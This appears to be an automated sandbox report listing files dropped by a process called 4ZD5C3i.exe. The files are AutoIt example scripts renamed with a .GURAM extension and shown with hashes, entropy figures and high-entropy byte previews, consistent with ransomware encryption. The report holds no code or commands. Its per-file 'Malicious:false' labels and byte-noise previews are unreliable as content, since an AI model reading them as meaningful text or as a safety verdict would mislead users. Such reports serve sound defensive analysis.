                                                                                                                                                                                                                                                Preview:B.5.\...|$mpv..w.\X%...2.M...@....[*...3........1..V(..../..o....^H.9...-..BB...i.-_3..+#...5..m.{..@...dq....<.P.N..d.M...la[E..S9....u.6.p.+..... .=.2.....=..&."..S...ur...K.R.IH&B..wF."B.Y.....R.R...mM...V..........J.n.C|p%)C`~b....H...X....J^.@....]bW..BB...6.>.N(..x.D.~d...+..=.g.^.&oCH........b..!..S...G.....B..j.(N.....h....g..+.:.NZ.-^&.\..... .S.-.-.#...Z.G<...M..UK}.V.g..*....Y.TA.g..1.ZMI.c.I.........`..:F.Y.+i..-.k......52.'{.6..Sv...9...f......<>.xa_.2.@c..J.......z..f%../xA...9.y..n.?(z.0x:CH..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_Assert.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):787
                                                                                                                                                                                                                                                Entropy (8bit):7.701565658725054
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:aMEF+dK/c2CAln++8ydjmejaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOL:avN/iAln++8OjmejmJrc0YXUZtwsTYtk
                                                                                                                                                                                                                                                MD5:BEEA8078FD1A3C80D0BB811AE3417195
                                                                                                                                                                                                                                                SHA1:072B972167290389B9460CCB3B35B737E4598D18
                                                                                                                                                                                                                                                SHA-256:45A9E57F076CE329CA66847ED977859D710D75F3BFFBB032A51DFEEF04A83240
                                                                                                                                                                                                                                                SHA-512:C702D855C5015E141ADE2CAA5C810DD59A537975921775F426C102F344E70800EB5FA67EB5002422DA344F1BE6AFE9DF89CACB147461AA6C6DAD2483FB28FC41
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.5l..rX.."oNP.z..'."....Q....8~.p..wCuu.#....ME...g.aO3J-M.Ay.....9.....*...% .q......Wh.$..D..f1Bd..Y.........PUC....qd. p....d.J.xSH..>....#.f.D.V.V{...<.7l.6..=....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.{.......'g..?....Q-7..B.uo....$k.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ChooseColor.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3410
                                                                                                                                                                                                                                                Entropy (8bit):7.942893933694085
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:zmGQVmZ8Ngd1tc9i6WJ450zhZXpfCpEhyd/gT1snkJ8pUfC7mF4il4o0jZtwx:yrm8NQcsDJi0b5fCO+I1skJb46pOlex
                                                                                                                                                                                                                                                MD5:9EC962EC0A328AAF12A55F8D2C13D11D
                                                                                                                                                                                                                                                SHA1:F1B2C92BA1F6B19F69479A47FB3BA8AB63C44531
                                                                                                                                                                                                                                                SHA-256:2D04966CFCFFAA08069D0BD94478465FEAD358DCDDA7F41FC5FC9FD25F742C39
                                                                                                                                                                                                                                                SHA-512:C270E138EA99019A56E72B2C4AF7DA5C307F57722A294FAA0D57F003416D89111A421213C5DAC74AA9EF153B884AF407C200203B9172B175AB66F82647F2EBAB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.H9j.xq}..).n^...;...j8nV......~=E.R.=..;r....o..&G..d.Lq...].B#^..9.~."......%Q% .K..<!..M...SrR.!.^......8..@..`5..@.U..:.V...K..pQ..L6..b.D..%...^.e.nL.G.0.Jw....:e.+Z-o...J.3.|..........GoE`.~..L..%...t.Wc.....U.f.E.Yo|..2.R+td..Z..%..C......H...e..F`.'..........a|....[.`R...R....,.O...6......*..q......?._..-..K..~&...}.x.k"0.+..!@......:..X.5..Q..i....e^...-K...9.....m6.bOR.!/+..8N_.~......-6..:.TX..Uc.&....j......M.C.2.:..R...c..6..9.....LAW.. .}.._.*..6.'s$...#..M..[fYx.3...(..9.C7$.....Y...E.....M...9.c1?...4.k..V{.?..".%../m.O=W.7..F&..l..t\.*+.[..,.....C....X.G..>....... .#....3{ym.5d..w...Q.?O..a.....7%..P.1.7P.56.....\D/...._......_....|..%.Jg%....YO..u)O...y.... 1......w.5....Pr.dS.R.a.~qK'.z.!....C.+.B.&.m&..J.-..W.P..2.Q ...........8f...e......_#..(.s.`..D.7..w....7...R.T.:n~_...(........)A~W..\.]<..yt.9H..o..#.j.....jZ..;Xy. ..u.s1.?'l.L..jd.........%.b.......U(.^..9}8.gT...'.....S..>5...g..u..=.._..z}).xc..V..ni..<3U.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ChooseFont.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1056
                                                                                                                                                                                                                                                Entropy (8bit):7.804177496700628
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Q/Cge54uxzXv5jo90KlS7f+ZthrjmJrc0YXUZtwsTKW:QqV7xzxjodS7+Z/v4o0jZtw0
                                                                                                                                                                                                                                                MD5:A2054CAD391736F9A0713219E590B837
                                                                                                                                                                                                                                                SHA1:C7C3B2E285E6004134A3286B15017C5B239F730B
                                                                                                                                                                                                                                                SHA-256:413400522A63D2C9DB265F679F896FF8A89639D3085D3B56F9A5AB6D3953FA35
                                                                                                                                                                                                                                                SHA-512:A009EDD0C28CDE9D6A0F5FC6ECBDC375D166BC61C2E32792FB532BF5BE14A4DBF14B895B399E6EF9C14EBCC443D3DD7EB0758B92FC624B6927385F64BCD84CE2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:%..Y|N..E.3LT-.WD.n.w=.......o/.E.c...`.K.....ar......<...[.4e#$...*....l+8....{.Z.}s......(..'...Nc..U....g...@...o....D...z....1n..|Tt,.C+.w....g..1.4.8rUt....Q.)x...<".[....v..O...=ll.=.\.P.o-.A8.............c..R.J. p.UC`............Oj.?a7?.Ba.'....-..uZc..Yg[.!...bk|(..U..Q.p..5w...r.....i.>`.A...[.../.....aj.3.6x...RB.I.AE8D...h.c,.#....h.r$.t.tN3...., .[9U.;..j..f.1.d1J.#[/..+sF...5..'b;b._.......d...O.).7..z.Ae......{.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.2.9.uPM.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ChooseFont[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1058
                                                                                                                                                                                                                                                Entropy (8bit):7.786396380853925
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Spa7+humbgvNQLTQ57vtI8KjmJrc0YXUZtwsTWFbnty:H7c1LiJjU4o0jZtw9Vk
                                                                                                                                                                                                                                                MD5:AC541A2F59C41BC3A7FD2E4F39E05637
                                                                                                                                                                                                                                                SHA1:C6C2C2B29BD98F6AEEF64A19316463A46D9C1412
                                                                                                                                                                                                                                                SHA-256:A5F0C60AB2A6F20AB1F0513F222963E83D8EB4848BE38127E1A88630DB572954
                                                                                                                                                                                                                                                SHA-512:D6254D62DD3E1CC3E8E012D24C684B4AB00BFC99397832CDB9633620C59459CEA4C09B0CBDFD78A59539BFFE723AD900C60A247CABB45C9987345C4105051AF8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.da..zYej...X\6..(v$..]..w.-f..N....?dSL5.-....&....<4..F.....0....I....S...*u1?...K......BB.Q...u..5.....^...+.g?...m....XOLC.U'>.f9....;).8....]-...T..=.!.....8.\.....xk..f.6.#Wb.t...#G........E.Z8M...P...]..._..N&..2p....S.O(..O.&......,..................+.`.8hQ.O..d.zP...IJ.J.z..q...?......._.............vI.I..#Jh.Yw.k5.=K2.3..s.*..-n...-.uR.pj.oKqq....m....'...yC..M.0..W.l.!.j.t.....d.&..M%.h..O.C..5&.\;.k.s.h~s..ya.N...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$......

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ChooseFont[3].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1419
                                                                                                                                                                                                                                                Entropy (8bit):7.856428033146176
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:IMO+cmfffMXlg+SSBhF+cqeLoO/jjmJrc0YXUZtwsTFy:8+c+ffM1g+BBT4o0jZtwUy
                                                                                                                                                                                                                                                MD5:996724BC780E607C715ADE2C6972B6ED
                                                                                                                                                                                                                                                SHA1:A00BA67DF321FC047993A5B812FCDD1800470782
                                                                                                                                                                                                                                                SHA-256:82AEB9349C3E6F43B92F9F6B075A5AFCDDADB555E1043F9E4B8D839C81D1FBAA
                                                                                                                                                                                                                                                SHA-512:F9AD703348112E126BE3389BF8D76BB83D0D133F2BD81FA3BF67E6A79A4CDFA63C8DA14E4ED0238C124FD2FE9E3C90CAA765115475B5CE56AABCE804126781E9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:f..0..4.....T.....iK...z_Quw......~P.Q.pp.....Y]H....{9^H.c....<....YG..h......pa...R.g%....A....&S0O......V,.8...~.....c......k.,..j..!.vg~..`G.o:..ut.'.o....l.......<.F.9..F.......O^W......w.....w6.}..8HuWi.o..i...v...1@ ./..^.J\....<=CgH.....Ph..*..q5F.....=.a&..=........w.<.Q...?C.c-.9......I4v.....R[O.`.s\o2CXj..3......z._.j.TnG/..]...N...6...]..^Vp.~....e"-..P...#U..)...m.....I..e..........X....z.-..hB."G6X.PH..$.i\...=..-..,..]...2D........pa..?5.%(0..5v....../-b....A..I.h ...M..U..C....D......z....X..A<..D.[0-6..b<AuX..`._^y....R_..L.{J.}`.F7m.{.~..W.i..Py.w..~..X.kX.fUQ..;.3..=.{.....S...p....VMkJ.Uk..!p.........tm.g....+?..E..x...'..z:!.~a..]XFF''p`...m...c..=...~@.s.....4. $.qK.0C..C .-.b....af.I....&.[,..t'U.1..O.^.a..Q!0/........u....wd...:t.I...X...h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_ChangeChain.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2356
                                                                                                                                                                                                                                                Entropy (8bit):7.912025600881806
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:6gcIWMvDQ8yAKwOgMmDXUx1UPbOmcqg1Qkx4TyJU8VIeBU4o0jZtw1t7:Bcb8y9gMmDXCxmcqKQ2u8OeBdle1t7
                                                                                                                                                                                                                                                MD5:B51B58BAD58D508DB2D1E7DBFE3302A8
                                                                                                                                                                                                                                                SHA1:F18843574DF789F44D3EFCA2CD48F1EBA55AE365
                                                                                                                                                                                                                                                SHA-256:AE9831E7CE1729F14600066443E196DAB0ED2D29AEE6AAB2D6BCA8F38DEBA228
                                                                                                                                                                                                                                                SHA-512:7F8B67310F9AB1461BEBBC53E0FF655B456FDE4291ECE695113E3652EF435548E2972D54A11EEFCF5E830F3B3BA235B1B4B104E889B66ADB8E1C3E2954A85D99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:!..5S....x.zD`/....Y...7.I?.@....an.P...16........=.^.T&._.:b.h.s9... .=...3..3..S.6(.zQ...V..*........_...8V%P3.kA.N..z)3.7v..]...>.F*....X.60n....F.8...*.':IE..@xA.(b.7/ Z..6q.=..j6G.`5#..._..* ..$s.^..{......w...........^...I%"......!.x..r..."..[\.>...#|.luQ^..L&$..6.......E..Ja........ .Ehg.,ka..)lY{........L...zb.Xa.-............;o....[Bk./~..Y....~(..v..j..W:....a%..E-.......Y..bX....-.*S.x..C.`St'.I.,.[I....b.m.i..a3]v.~.._......=..J...9.........|.j$...'...../=A.F..0.......%...<....K.t'MS.M.@RY...(.9,.2...o..)..R..~........=.E.t..2o.U....*..hlsl..Z\_..is..M.W..=...'.U8..H.$.j.>..o.T.j'!2.4qo.a....YF..;......o..C..y#...Q4]......x.b..#..........q.M.u...R1.h..}..o....9."..t_8p......8.M...9..*.~..5. t.|Qp{K........O.L...a!.>....9.B....r##Z^V......6.u..@.}.\.C\b.N".l...*b.. ..@~y+.=.=%..N9v.............W{!.I.f.V..K....]%].d.....n...8u....R.]....Q.I...G..#...S.[..JF.,..9k.;}.....m..' ..E/...e[.....~.... D.z;....5x.u...B..E.k.p.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_Close.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1695
                                                                                                                                                                                                                                                Entropy (8bit):7.870068931933657
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:+Sfj6RRc/M70pY4jsauhoTG7B84o0jZtwvk:+SfORzIy4Qauho6Bllevk
                                                                                                                                                                                                                                                MD5:D663A7AFC2709DC9BFEC67B8F06DF620
                                                                                                                                                                                                                                                SHA1:92E11D5B7DF1180785260FB551B8CDBE0481E13D
                                                                                                                                                                                                                                                SHA-256:E3E93C024007D20904272946570E732E26D557DB719F625FF27B7CA90620E9A3
                                                                                                                                                                                                                                                SHA-512:E884354639B14698548D42CCF1311F9BAFB59BBA8C274E7FC45A0CB14873B51947FD1DB665B2256C4F86F62310A060A43F86152E0308427259C921EDD390167E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.M5..|..pO ..{i.4!.ZX...J@..@.5..^...@V.}]..X........q-..S.'gz!4'........]..,.(."%..../...&.....x.X|."d.e....I...%.z.3~]3.n+.P..i.wF..5..'.d.....7/.o...K...E.A..=...w...0"Bp..qU...l.. ..m.._t...w~8>.Z.Bm$...UP....*.[r.w.8%...C.Za.+v.....y..+.[b.....*.z..5....>L.ro..Z.~K......(M..l.o.uP#...N..3[...v..U"...........v+....[G'.,6HN%ff.c.....CY.~.:y.x...8.W".U.. <...].....V\&.\..O}..W.R...."...Q6..k6.rt.....S=..f..C......H}).i..y/%pb...#n!..4.E..b}.......3y..x.O{...L...P.NW...6...._8.A..Qy0.<(.,.u...'..f0.!...+S.>.....PtH:..&n.4...m#.....')S..V^.......B...cT._.P..k..s.o.!O.M.L"...\"........(.._...t./....S.....f.....t.V{.....B...d ....<....,.N.......r`.}m.-.....L7O.>i.]Y?.....LH.Z...$....x.Y.|.y.....D....".Vz.:...cT..(U...L....g6..B.G.B.w#..E...J.. l.#.Hz...U..>-UT.[....[....L.L..9r#%.'......>....2.6}^..Z.F...E<[9.2.G..a..'1....'...k.H.&.h........S.).=........................._.......F..U.(..Q.$.../+...&.Z...Pf._.I..D...n.I......h3.9'....P...E\m.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_Empty.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1871
                                                                                                                                                                                                                                                Entropy (8bit):7.886744984843462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:8POSLwkkqCdd0f3yyfGJiuVB8e14o0jZtwmnQ:ZSLLkhdd0i7J9ceelemnQ
                                                                                                                                                                                                                                                MD5:1295689B449C509CE8DE2330E7073E41
                                                                                                                                                                                                                                                SHA1:641109972B27419B0B6FDE46DD5F969184889CDC
                                                                                                                                                                                                                                                SHA-256:4368242C9D59F4745BD5F55AB3E8FF5D9067EF680D7DB27E03E5D8D8D8787B4A
                                                                                                                                                                                                                                                SHA-512:6000951E381B09E0A1C00E08F9F9C1C33A544401F2843AA94C7BD39C1BB34945411FF16431398A51A172F29F141FAE67E7BF90027ACEC10DC185833E56E332E9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...+..#..%...-.....(.M....C-Z.F...]uKj;..w...a+..Rem.Q..."...P..DY....H....W.}..........."...)..Ot1z..KNb2........T.v..*h.c.-&4.[E..{m....B;v.].....q'..,....<4......1.x..y...FC..\].....!..z..eO..k.F$)>.s7..^v.;.5.p..v....b...;..8........\..H..T....H#.":4.%"..s._T..@,....Q.....z.L.<*.-Q.5..."aG.d..V.}....O...P!r.........ho...}...t..H..[o.tc.Y.A[~...;.U!iv..I....a.E.L.k..Lz..t.ob.....[.....l.b...-..i....d............^F..'..s...5.v......../e./.!j....ba|...N.5...K...B..(...:qK..q..e...|...w\...h...WQ...x....U..H.Pi#.7.)..."..#.V..-.bu..\...3W..<2s$t<.H.HP....;.+*I.r.N(.!q.a!6......7..1...5.u.....TAw.tQ.|.a..._4.6.X.-u*G..{Xu=.|0.Y...M.q.B.b.9.:.l.j..h.k..g..7..O..zG04D.,..F..Y......`......g.....j....1.(.....g=.rg4e...... m..yt(....Y.^......R.l.t...Uo..#.$F\..^..&..q.u.....x8.C.&..6.>.'m..'A..d....p.=}5Z...:..S.....+7...H..fz...S.Hgi.< <..N..eE'.J......r....-...X..(k....E.I.f.>..f$Ju.=K.|..R ..u...L.O...9...(W...b.wa..a.U....n..w.C/.R....7...t

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_EnumFormats.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1776
                                                                                                                                                                                                                                                Entropy (8bit):7.880209919442462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Nt3uw/fw4+4vT5HCLY9mTcWq94o0jZtwV:Nz/fwCTFl8TcWpleV
                                                                                                                                                                                                                                                MD5:1C88EC79E48C6CE9398B7A79ECC8CFBA
                                                                                                                                                                                                                                                SHA1:E04CE6659973D91681E91960159BAAAB16C075DF
                                                                                                                                                                                                                                                SHA-256:4B43CA0B2FF0733AF57A80C6318C5476727CA8D947436E5C03FD9576159C3955
                                                                                                                                                                                                                                                SHA-512:B831B6A4EC5D17DDE2985C6B0E1CC5A9A3EA9D0F5BFF033686B9915ADC57FE1620E2CCAEDCAAFAFBA60334D5402FC111310FCE8327F5703848E1BCA50257AC63
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:W.8.v0.z5Xm.....05....U6=S.)64....v..4.-........@.U..m.P...@.'0^..'.Z.]....F>e.\.c..n.....,.....2.:@?.T..4.......9...9.-....u}.t....VJ...lq..a..vo.but.....'...zO.A1[.....G:..u..m.;~)...L;.6..X...S.ph.0.WGG61.....~..!t.O..]g.y..}.a`xi.rh.I...P..`.b:<0.zQ......Z....[......n....2.FK..Y.!.|.4u.q...B....*...g.K>.D.k\.@wDE....wL.M..]....I..g......-.C........q...[-|..XG..&.}..8.Z..=..J.8.....:..:.. r.|.J.\..Vf....w...fn........Q.......X..l.F...9.....;=#....:Jt.uY.~...s.R........iN..5<z.Zk.~MFs..;=...lc.a^..........5.....CD..P......tiNk.j..u....v....E.@...K..$.pQ.V..3y.~R.._.e.4|0F....5..,.../...&a.o7..=.j.1....u..N.........9y...6.2..*Gn.`.+*...X.... .I....<yw.]./-...........2.W..Ru...&4....u>...P..]..F.O.A...E..n.w.U.8z..=....{.`....L.S......6Y...`......0?gXL..L......:G.a.m.J.I.us..[H.Fm....4..l.,...%H%@s..dH..V..2....qR..%..+....B.!.m.Q.!.}.Q.9.#.L.+../+.....l...:.#.1.70)Q......f.3....$].q2...S.."... P......!u.0.".........7q.jQ..]Y....2.=.. 8..`

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_GetDataEx.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2080
                                                                                                                                                                                                                                                Entropy (8bit):7.90489968087982
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:/4TSijoh4LsrujLl0vRHkW7wa4o0jZtwn:A+ijohu7l0VTw3len
                                                                                                                                                                                                                                                MD5:9F6EB78C6D6D7ACD04C6D6AFB07D54B7
                                                                                                                                                                                                                                                SHA1:33F4FDF991FD71C8CBCDF27DC51CADACE7DC2055
                                                                                                                                                                                                                                                SHA-256:39902B0A4C1C5200AC5DCEB464C194E9A3B50C47EDC4351DAC03B0AC22C72684
                                                                                                                                                                                                                                                SHA-512:D714D817AC0EA6F957B83EF33EB6088D52FF3F3EF8CAC719E0B46CB362610870DDB059F3F991BC53B002B9C13A49F1A13761A51C824AE41FA7988F0A25F6DD40
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U'.IuF.}-U1..V....R[p5..O.)G.1......(..y*<...n..zC+...ap8.[..1..X ...*..E...MG<Q.z`a.]..*..A!.i...........C....f..=la)...}E..R....l.y...!'ob....F..*..}u".8a.l.Xp.v.....4.-).~l..eOH......u...!*.O..3.C......R.~.?.I$*.Rpq...]4vjeL..&.T..L...z?.....l..Y3.b..>....V[.;G.357b5#..qP.0...4...'t.Y.B%$n.5.R.k..NC.6....9U.+..]./...x.l.?8(;;.>............y.. .Z...........$K0...q9?=k... L..].....&.h/.P....I......7..iX..D..P.|.;.G_...p......*....<..........Y.~.Y.\S..R.E'1..q..B...xX.i.....L$.3.A.3.PJ.. -B.....N^.~I.xj.e..n".sGm.;a......0HH.;..I?Y..L..=j....T..dw..6.U.p.X..).v4_N.;....+.....g..'..0.....e.Q..DRa...I.......es.-.e.H.....b_..#%..,-..p....n...n..,.J.._..csm......]..Z5....R..... H....oFy..hY....nD.....<^...sm@tz......<...`..?d........?=...Na.....9.....\=.l.....W.O..Y...W..L.[r..9,"....vpj...^..\.X..9>7.}....Q. ...R..My...>x..i.t....A.D......Y.....P$....3pM..g...>R.............0D.U..0..*V..TCc3I.+......p........Hf.aZ0.&....MB.".j...=O\T...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_GetDataEx[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2749
                                                                                                                                                                                                                                                Entropy (8bit):7.930099188478791
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Bzv/erND4E878rMAprh5oK2SAM8EcvPGQoiUqWCCFh74o0jZtwz8:lE5wAL5olIDcX3MVtAlez8
                                                                                                                                                                                                                                                MD5:E3E709791A2070A22ED2AAAFE53D0CA3
                                                                                                                                                                                                                                                SHA1:785C98F6F3DEBC3C014D9A1F530F8C04A0DEB007
                                                                                                                                                                                                                                                SHA-256:479081ABFBEB04730A33CE478D35AB1B0A169F6E500F131FD25F0BCD3F0A7D6B
                                                                                                                                                                                                                                                SHA-512:4CC64AE8C31706B5836965F0D633BDDE1EF93C1D8B97177A78D7710D63B4BE2B138DD48C609A1AF3C2AD523A3EF239D97CEB46C327BB63CED3F5ADF444857FFF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
